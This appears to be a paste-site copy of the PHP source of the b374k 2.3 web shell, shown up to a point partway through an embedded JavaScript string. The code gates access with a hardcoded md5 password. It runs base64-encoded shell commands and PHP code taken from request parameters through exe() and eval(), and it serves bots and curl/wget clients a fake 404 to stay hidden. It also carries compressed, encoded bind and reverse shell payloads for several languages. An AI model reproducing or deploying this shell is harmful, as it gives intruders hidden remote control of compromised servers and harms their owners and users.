· 5 years ago · Mar 15, 2020, 04:30 PM
1<?php
2/*
3 b374k 2.3
4 Jayalah Indonesiaku
5 (c) 2013
6 http://code.google.com/p/b374k-shell
7
8*/
9
10error_reporting(0);
11@set_time_limit(0);
12@ini_set('display_errors', '0');
13
14$s_name = "b374k"; // shell name
15$s_ver = "2.3"; // shell ver
16$s_title = $s_name." ".$s_ver; // shell title
17$s_pass = "0de664ecd2be02cdd54234a0d1229b43"; // shell password, fill with password in md5 format to protect shell, default : b374k
18$s_login_time = 3600 * 24 * 7; // cookie time (login)
19
20
21$s_auth = false; // login status
22if(strlen(trim($s_pass))>0){
23 if(isset($_COOKIE['b374k'])){
24 if(strtolower(trim($s_pass)) == strtolower(trim($_COOKIE['b374k']))) $s_auth = true;
25 }
26 if(isset($_REQUEST['login'])){
27 $login = strtolower(md5(trim($_REQUEST['login'])));
28 if(strtolower(trim($s_pass)) == $login){
29 setcookie("b374k",$login,time() + $s_login_time);
30 $s_auth = true;
31 }
32 }
33}
34else $s_auth = true;
35
36// This is a feature where you can control this script from another apps/scripts
37// you need to supply password (in md5 format) to access this
38// this example using password 'b374k' in md5 format (s_pass=0de664ecd2be02cdd54234a0d1229b43)
39// give the code/command you want to execute in base64 format
40// this example using command 'uname -a' in base64 format (cmd=dW5hbWUgLWE=)
41// example :
42// http://www.myserver.com/b374k.php?s_pass=0de664ecd2be02cdd54234a0d1229b43&cmd=dW5hbWUgLWE=
43// next sample will evaluate php code 'phpinfo();' in base64 format (eval=cGhwaW5mbygpOw==)
44// http://www.myserver.com/b374k.php?s_pass=0de664ecd2be02cdd54234a0d1229b43&eval=cGhwaW5mbygpOw==
45// recommended ways is using POST DATA
46// note that it will not works if shell password is empty ($s_pass);
47// better see code below
48if(!empty($_REQUEST['s_pass'])){
49 if(strtolower(trim($s_pass)) == strtolower(trim($_REQUEST['s_pass']))){
50 if(isset($_REQUEST['cmd'])){
51 $cmd = base64_decode($_REQUEST['cmd']);
52 echo exe($cmd);
53 }
54 elseif(isset($_REQUEST['eval'])){
55 $code = base64_decode($_REQUEST['eval']);
56 ob_start();
57 eval($code);
58 $res = ob_get_contents();
59 ob_end_clean();
60 echo $res;
61 }
62 else echo $s_title;
63 }
64 die();
65}
66
67$mtime = explode(" ",microtime());
68$s_start = (float)$mtime[0] + (float)$mtime[1]; // to calculate script execution time
69
70// block search engine bot
71if(preg_match('/bot|spider|crawler|slurp|teoma|archive|track|snoopy|java|lwp|wget|curl|client|python|libwww/i', $_SERVER['HTTP_USER_AGENT'])){
72 header("HTTP/1.0 404 Not Found");
73 header("Status: 404 Not Found");
74 die();
75}
76
77// resources $rs_pl $rs_py $rs_rb $rs_c $rs_win $rs_php this was used with bind and reverse shell
78// use gzinflate(base64_decode($the_code)) if you wanna see the real code.. in case you dont trust me ;-P
79$rs_pl ="lZLxj5MwGIZ/Xv+KyvU2SLhj80xMVllcGJrlvLHQncY4JQw+BzlGCe3pzG7+7bbIOaIxUX7q9/bL8zZPOHvi3Iva2eSlA+UXXEFdoDOcSVmJseMkPIXLLefbAi4TvnMqZ3P1/NndhcigKBx0LwDPg/GY8eQOJEWEC5d8CtRBZK4B+4rXEq/88MbdS6h3dMlG7mBNlu9m68mAtvcqpE2/yPBFblCUfzY16PvO+arS3Do0tHMvuGFL3zvHzrVBj4hIdwuyqrnkm29lvANzIJNqYFEkmteYzO4vX0Xzhb+y+yzwriO2Cv3pjU2k9fCQ5mBaTdXLafj6reuOrAPqkcolevww/EhRT4DUKF5pFgveRJqiaCyIQv+W+dPZLLRHitJTr0/Vjt6O07SO8tIklT1f6I1ounhvnRp7RS4klGr7qhPGSQKqxrOZ1RQrnGcbjWvcuMZjnPCyhERCui4Ne6j3eAUlZqvZfGEbL/qeQR+D4HZlG5Nu4odhm6Ae7CHByumpPim4ANOz6M8D+3XQ7M6guJ1JMa0Gl0s8pAgdERTiZPTpn0ZJ1k6jZsrdvAQZxZIrX1lHB4nd31ySvHPdmlAOSdyJG23s37SZrbZJnxkWfUxab92oFaejv5v7L2GNJjhobab6e45IfT8A";
80$rs_py = "lVRtT9swEP6c/IpgpmGrwaGFaVJZKiEIE9qAqu20D8Cq1LkmEalt2S6Ufz87SV9ATGiqWveee3vOd+f9vWipVTQreQT8KZAvphDc3w8KY6TuRxETGdBciLwCysQiktHs+OvJ46EuoKoiv1xIoUygINTLmVSCgdah0KF+sV/BHsGEplyAL2OE/ML9ZDAPamfMSN/3nE+89aVDIYFjFtYm8UQtbWSTiaV5ZXQ1TBwMSr0Hl/wtSnxPgVkqHjiUNhGpgjTDpLOGbLQdaCENJn5NN2WmFLzhW84DoSlPF7AXI26Qhbx5zOi8rIAL6+F5Vm/LN7DACFb19UyS0XW8MqAWp8NxNz74NPx9MTg4bbUWOq0boIvgsAy+fUYdbRSekw4KBrtCbyvZPFBpcNmfC5s6cDflJM+ol/r0lGWlgD3h7lHvxPHyYMVAmkYrU61rrI3iucpsCViRwVEDeLNYAdWQKlZgxLL7AN/9udcPHYJCFc6rNNfO4Or7ze0oOT8bJ6Rxs4FmbYT2umRqClrqrFR4RnMllhJ3CVnbuAtjxRtlq7ONAZ7hdT9aeEvaOrvRqOdJkZ2kSxOkPKsrsv9dTW0oJ/mbIEE7FpeplZpur3P1NzOD7jnqWJI5GPbsxgMNkJ/Htsk0VfmT395cTuK450Y6zu+6Dz5UO/jxFvcKe/ac3uaHVWlsuXY/Sm6wJL6Om7WhzYFb6exyenWTTNqdouPb8x/T8WSUnF1bF1uYcQohN/bj259TZ7TrMh0lv8bJ2cXFKLQZ35DW1E5ghjE6ovUHhdLdtqZVaUeZ4y+vPFw5btAC2znBOTCDcdF4bIfMLT7VFYB03pumvbdBnm6ag+rHpXkfgn7QxobMNsA1bdP3D8xRZ3dg2vXVxG/9HXP7xKQktg1kji7+F/HuR8TZ/xH/wPxd4oz4fwE=";
81$rs_rb = "tVZrb9s2FP1M/QqWySprcaSm6zDMmWL0sQ4FVtRI0w1DlRU2dW0RkUmNpOoUSfbbx5ccu7aTDNhoGJTuPbxP3mPvPcpaJbMJ4xnwz1i2ky/RHq60btQgy6goIZ0JMashpWKeNdnkux+eXRyqCuo6iyT81TIJOFaCXoCObwXNWFd8PIc4ikqYYtXSCxUhCbqVHJ9+ePHHp9Gvz89evzt9m5ZiwelYQTofa1r14rlaMH5tv3PGZ4s4GWrZwmA6rhVEwEtvUcK4tk56SsvEWM7NHiE2xa+ZiRUumdJqGJRGOwrxpBwWTpp2BlItPpnQrGF73EWKdQUcy1ymM9VOelmRZX1SFCTBDhbSkD4ac+j56S+/pTXwma7y/CjCZlnRxyfn+d/Znx+fHP54fnXU//5mPxs2+RuuYQayFxDJwASr3RmVn70cvQf5GaSLk5B+kzgNzVU6phQaD6RpIxnXmLhuYNcNPMBUcA5UQ1lw4nATmDHunuwygXKhQy/wyprm1FaBrQnhEihWzs+0R+CyEVLjs59P3+aXGuT8ePT+KI+L/dHvr4qT+DjojfDY3SVV4UOGi5+Kx9+UuDhx21O/k/7UfpKlN7CNXXXdpbfsMUlJckBOyBpqUZlO49rEPgO9npBdcswUYJBSyBdS2ORr24ySQSGH+9kGPlSnTmkl5k2eE7IBCTBrh5Y4/TZjWyF21Xkd7o5BZqwfx4k3vPNEd3VLMz9UC/ll2KuTnWjvY1mge5CvmDTejeW7gPYy79I9rCNLS7UKZSoWgzvLtC1pX6cHJ3Qf/D9NC3aaevMubUQDvFf3iSTJ1TUT1515JizblAfEzOXBhq+b7c62hP21bPW9e5agaHt77w35LekFuGrlbQYqpbVYyUjlnNVRZ8v3cI3YnjqC3EFsxtEmtR0baZW7t6Nzw7G2gCEgT7ie8dyPh2e8vavqxrEeUg/gOOQJDqE1akMITQ1fOkZD1t3/TWSoy2wZ9OaFMsqOsJQnLCNB95CUix9tYSYU5KtU5GRoN/Gg7tAWmkHd4VVGCcI18vAi1zu37kzY1eUrJtgdRTfIm27XNf/GOQTktulUD5zONadh91v4M7B14FCYNhulnzPz5CYMhfHyk+fAVvIP";
82$rs_c = "rVJhb9owEP0Mv8JjU+tQFxPaaVJpKqFCJbQVEGSapg1FwTHEqrGj2EzQqf99thMYYdqkSf0Q5e7d8zv73uEmSLXO1A3GRCa0tZJyxWmLyDXO8OLqw/XTpUop5xg0cf0tE4RvEgpulU6YbKV3FShnYnWKJZwtTrCdwnqXUfUnrCR5orqKC6qZ+TATVXwjmFG3GBMarGMmoA3ifEUQSeMcNE3449vc+1mv2YJCBMnA79Zr5qIbYgDTLE6SPGICMAOzJbSHg6Bjj9RYSzERLeM147ug9xANR4Owe8Azmesg1VIoGGvJoOvlzz3vN8Vqt5T7OSaHw1Gv359GvdFXR1NB8V5YqqPZ+P5jNAung94jahcUqi1HZhoqU/4UWYpjRtPB59nA6qEziRR7pnIJZdl/Cd8oj26ZhoXMgonECMCTl4Omd8ZQe+sXLG4GSoXhvXcpCWJCqOvcPlzH6BDUcHsB3F6AG0CkEJRomnwXDdS5LrnJJusYbiXxj5NOIbkzTdewQbd2pCAcTB+Drab5ujuZ+cH5u8mX/t15t6wayISUAGxehFUKLlmjuCuXikJi45d6jXJFwcHOq9e30y6kiwpiZ15M+Znmco8gM2tuprknXPgXx8he+587MJxMpuNwHIX3k72vsBz2X90sN+Gk5nnebft4I5yT6j+cVNXEP05e30lVOPlS/wU=";
83$rs_win = "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";
84$rs_php = "7VRNj9s2ED3bv0JRCayEai3LDhBgXW4u7bFA0BboIbsRZIqyCEsiy6FqB9397x2Skj82zm6QBr20MGxTM5w3X0/vh7eqVtPvgtoYBTdpymTJZxspNw2fMdmmKl0v37zeXkPNmyadcq2lzjVXUhvRbaJ5vJoCN7kRLc8b0QrjTHKdi1Y1ggmTV00PdYTGKTGF3nBDiQZ/Wo0moHyvGkwdhUGYDEYMIQxotly+wdOuoF3fNHjihxPUNMRArCX47adffqZ7w3W7evdrRq/uyLvff7y9Wg1utK3StehSqINrEWJsS0PXWeA6C24CJruOM8PLuw79U1FFTPadicYSY0qz+K/phChKxvInBCsI7b9BONGVeH6c8gb4pfDFeTi8n997iIMhux+xCrZ1WLaOqu+YEbLL+V6AgehKsc40eSX19ir2mKKkR6Md9gTjnJleZzHGmSg7sXrLfLAoCWKf4xpBlFF8HuErwJKG/lw6oGA0L9ocJNvi9oHrP7mOQsMUUmg+c5+bcEZUQpAxnXR/GGMTjqEDa2SPM4Jk6Yoh7AlywRhX9sJQKnqNbOQOs0G/xqcI6Zv3XdHyKE7myTLG+sOd6Fyhk2qnheERYQlpZzhhtsMGZ+FtaOEmu1o06FSvKK0K3JkLsQuq7DIwyt1yE9J8k7eFYXUUpqy8C6L3H+7g/vs4FUhX7FLr2EdPSFkiwbVfpY8WkJdCR+iJY1aPR+8mkp7W5YyP9mcgkdGiPe2aKNeh3U8YPDwEn/H/0aM/DtY4y+1qhAswGd/bjjEXsnz2SeaTeUlXoC2lYo0EPo5jfHIbQbcFfjpqd5GUQAuti4/RnN76Q6iE4mES6jBOsqfGHRoXF4weTGmqtGS5VLzD5HWC8Dh5oZwbB/UKp6w5yF4z2yHu48j6U86tG2SWlS4bjG9gMn/+RvbijcWzN9jg9GQzuh9oZt9rLis71ocHf/Lp4vi4NaKLYYZ2rkM5Q1JPoEPOBrUrwvsJKiW+bkViNfJAYNHlRxxdHMgqaIXxpTMzGDg5rnIYEBHxkZZnWGNBlwBH3yeo7AXAxTOAi5cBH885ekLe8ejbOn/OnjwP43WUG83aM/6g714UrVAPolhZ0fIErZ0q8A6/o7Z9vXrBV6kX/GfVCy6p1+f0Cv7Xq7Mb8JJewZfpFXwjvYLLagD/ml7Bt9Yr+BK9+sci9fZ2+jc=";
85$favicon = "AQYD+fyJUE5HDQoaCgAAAA1JSERSAAAAEAAAABAIBgAAAB/z/2EAAAAEZ0FNQQAAr8g3BYrpAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAAphJREFUOMudk8lPU1EUxvkbXAMdXlug2Kp0eu8ViiUIC2wZJJYqkwUqFiqUMjqgAQppUnAIiBKmFoq0thYKBI0GBGMw0ejGxIVLdyYmYDQ0xPD5HokopmXh4kvuyb3nd853ck8cgLhYylymkblIadlzxmNVUXpAuf3vmwOB9pma+DvWhElkhFRhy4Cer/YpaugZ+bdDASfZiktU8+84PaiKqP3Kr+YbOd6CXnqbHpPtltjUzpgAzQK5mTFPRvZaDpBb9KwClFcOyi1H53oT1j+H0O6qgK4mrSUqgPGpTX+khMZHbuYFTiH4YRxPPk5j4KUDklvJqFjOh//1ME70H8VxZyqkDjFTdZ7cYnzue2d87mZ6Kcy+u42epyZcDZegNVwJzTAJiTMFpmkDsgtEn/Y7YHzuMD5BP1R4NF7yy9lgAbxv+3FzqRz2YD7KprJg9BfC92YEQ6sDkHanQG0Uhg5YoKblG6RbBnJchsD7QXQulqIpoEeZWwvDjB731xywzxrwYKUXkk4xxB2i7ymtQuuBGZCjsojRVwTXcysa/TqUTmSh2HMa91a7YZ0qRNVYLgNwQtwmQrJdsJvUSEBUz/8zQNVQ2o/aoAl3VtpQNpmNMxN5cC22w+LRwzSaC8e8DQ2TFiTZBEiuJ46wOYSZe20fQN9V9KW5JOhaakPxuA6uhQ5Y3DpUjuSgZ84G6roSostM1TqiOuY/kPUdWyOauRh7MYiuUD0uMqCeuUZcmWmBsI4PQS0PRA03wjdxmqMCWEmvitekHWI0uGth99RBahPvJQrNvGomUcurSNzkliaAcy6eiApglWoXuZOs/J+CS0xFMxf8Ks6rWAsXd9g2suJf4GzwyhPBPZ9A/BeAFccYv5NoiN+KdvcLtyxxEwhxgvoAAAAASUVORK5CYII=";
86$style = "rVZNj5swEL1X6n9Aiiq1VUCYULoL97312HNlsAlWjY2M6SZr8d9rgyHmI6kqrazVRjCejzdv3vBVlZxJv4Q1odf0Z94x2Xk/OOPHFgtSZn3O0VXlsPh9FrxjKD2EYZgNd1ryhlMQNZes4JSL9FCW5fjmFZNzJdM4DHsJc4o9WamiE602QriEHZVZXwmVc4GwSEFz8VpOCfIOURT1UFl3cfF0gmUm8UX6CBdcQEk4SxlnuIdpxf9gMZm+vLz0jcCqgQgRdk5D76m59CUXtUKkbSi8poRRoi82q0T6Qw0JWxQIAMgmR7o64yrza/7mj/n6AiLStSkI9fOdR68EyUr/DD/1hwpD/VrVUJwJS8PZbThWBSk5s5TiUk6mnkQ71vPbCqgb9JGJdvM4X9Pw57+J9KWArDUYpIJLKPFnH5yC03eEz1/Geh4YOBG9uSG6vxouzLoNXFNsz+AV6z/9vz8I3GqE1X9gt2WEJcFUZmz7YXrpVyPNQGJurjKyKUMIb8kNrPDCPjC1EVZyy0DfdGAnqL2YODCb+owjE3P0I3OqnJZPz1pPCmUTjHTWmWarJAWktuk1QYjiPjjDKzwGDpVtbHeOck5RP9i8R2sziqXURbcNLGxJfWC6WhO1hnnmlDPhLtLRsznZvwd2J+haRN6lth2uxRuqxbeKrYy4NZ0Sc+6n869sbjMUENZ08u0YNILXjTwG+A+kBUd4Mz+W96HLsynpnEvJa5eep2dz7otwbwOqLYnmDG6UzSxLTxGup5TzTqqV+0XKz+as2j6PWbw7yEbaA3xp9JVFdJdy4WyhRWdX9+f3Wifv4qNDZYtNsJCLvWmUvHFcV/McJHYO1kAuh8CpTE/9DqXAkzmzESWtHK2W2hq0uNYL+ErmpTWMzlbiTZu0erlW4yNvWLd78DrTPCC9GonkgfhOrqujRmZb1o5UjfaPO2StKnC0P8RePVWknE1ZYKZFxCX+t1VZo8IvyVqYMwMx7JmVGiUbiUgezd8ClrmDRVFokSb4tSTLFjj7ZwH9HVgmFwZAd+3Ej1IylN9pzUR5YBRvclxo+DSQs3MARpZrTbzm/PKu+xqsNonTJBvOtHj7xXPr5N0mxPFSgKy/9T4W7S/7HeLiY9O0Dswnrc3hNERd7UFv+gzckmRL/jngjRrafx+UnGvOuXQW5pZTM0iWW3GHqY7QG7J8/PAX";
87// http://www.kryogenix.org/code/browser/sorttable/ - this makes the tables sortable
88$sortable_js = "vVhtb9s4Ev4eIP/B0XUNEZZlO+19ONPcYNMXbHHd7gFb3H5w3IKiaFmJLLkSnWzO8X+/GZJ680vW7eG2QGO+zTPDhxzOjO553lmwi6F3yy5G9PysyHKleJBItpHj+ToVKs5Sl2x4Hq2XMlWFL3iSSOnHT0/u/iBbeHfdrkgkz9+nSub3PHHviBdmQi/0RS65km8Tib1utxqPpLKDxfXjJx595EvZ7bqVNT5ng8/uTXgTXpHpzeDG7892erpLrvTfFwMvcZ/Fdh0N6xCv2iMnm/7ognFfJLwocJFfwDbEwh3cBGgICtwEA9Lt1mbdgdiWELL17sZNpCEDoCOKF5KHDvETmUZqAZuEAXaYoGqxB78+X61kGr5exEnocj/PHorpcEY87sdpIXN1LedZLhENhuZxXii9lBCarpME7VE/AxgotK0/sxDR4UbEc3dUSWu11nSyQR6CTKlsicNsOqNggnsPVypgQxpMeHM5DXo9YhjWtgezo0wbTMO121YybXct9qwGJRQMbi8im4qBd1mmkPJ5dpzyOaxxkNcm4TAKTOL2zNYOmqG3CCtbkjv2o4WhTKSSnfbMFlmHRotqOANfyCQpGqrtuqZO2PKFHW7zuuSqplVf2S9phm0kl2zcJUyzUyXdKe//Z9j/x6xHtHi3e37mZvcyz+NQMoSajmB3DbiVHu12ndI3HMbU40pm804FO3Ww+cXplUizq2fmxrXv3brcC1rqMhY0uwKpvM7CWCKPFO+laGzWk6wG+8oajx3QiRdVLeLi6B01lGBLhpqNGiuXYG2Brojy6LxNnF3YXK4SLsDtdlEdb2/oi4V2LGgul8CMuWcH3rvrx/fhLu78IYxT8G7iYQ/woHfUF4oVT53mSj8O2Q6gmXA8EzvKZWkq858//fKBOd00KFa0+7c/Lv9+/Yo6xvBdBzFihMqkkJ1vpb9k5f9zDBXn+8fxPxyDZc0egzmUU47BrDxwDPZcW4sOH8LbY4dgxMwhbFT5HOmlK56DJR+zUNLELad8gaI4WMDpN8OfDhgpTHwCZ9cRp+adfyPp+in+RnEtBoGZuofYPdFBTJy3XNYEtE67SZt7yKFOvAVGl3WeZ3SVftK+vD3mdPYooCdfLHrKxaIHL9b52e7Vos9eLbg1X3ie80dMFkSWmNuVUZ0/mE3puFclEhxCHp80YyyHeFfBTKtWlQlM6xcgdHUM5TaGTkEhJEx2bFYb46OIeSdWwG1gLdFGVAa01GgrVNDaZ20Un+lAaMN8Nb7dYm4ifB6Gb++B/w9xoSQwSfaHXEcksbhzPOndWoeU/hxSbvjLUtBNhR9AF/6yDdxzpCpi0PO1HI1grtGHNZ7ws1R3wB8jiIesGoDEJpoC8IxJWg2y1Rb+ebeNtBairU755ilrFAp+Uh2WAK7EpBl0WwmgMJmKkn8o1jykPYGpKE8MsiVwZYgFIKPjMjbK3ORz/2p6sx4O+csX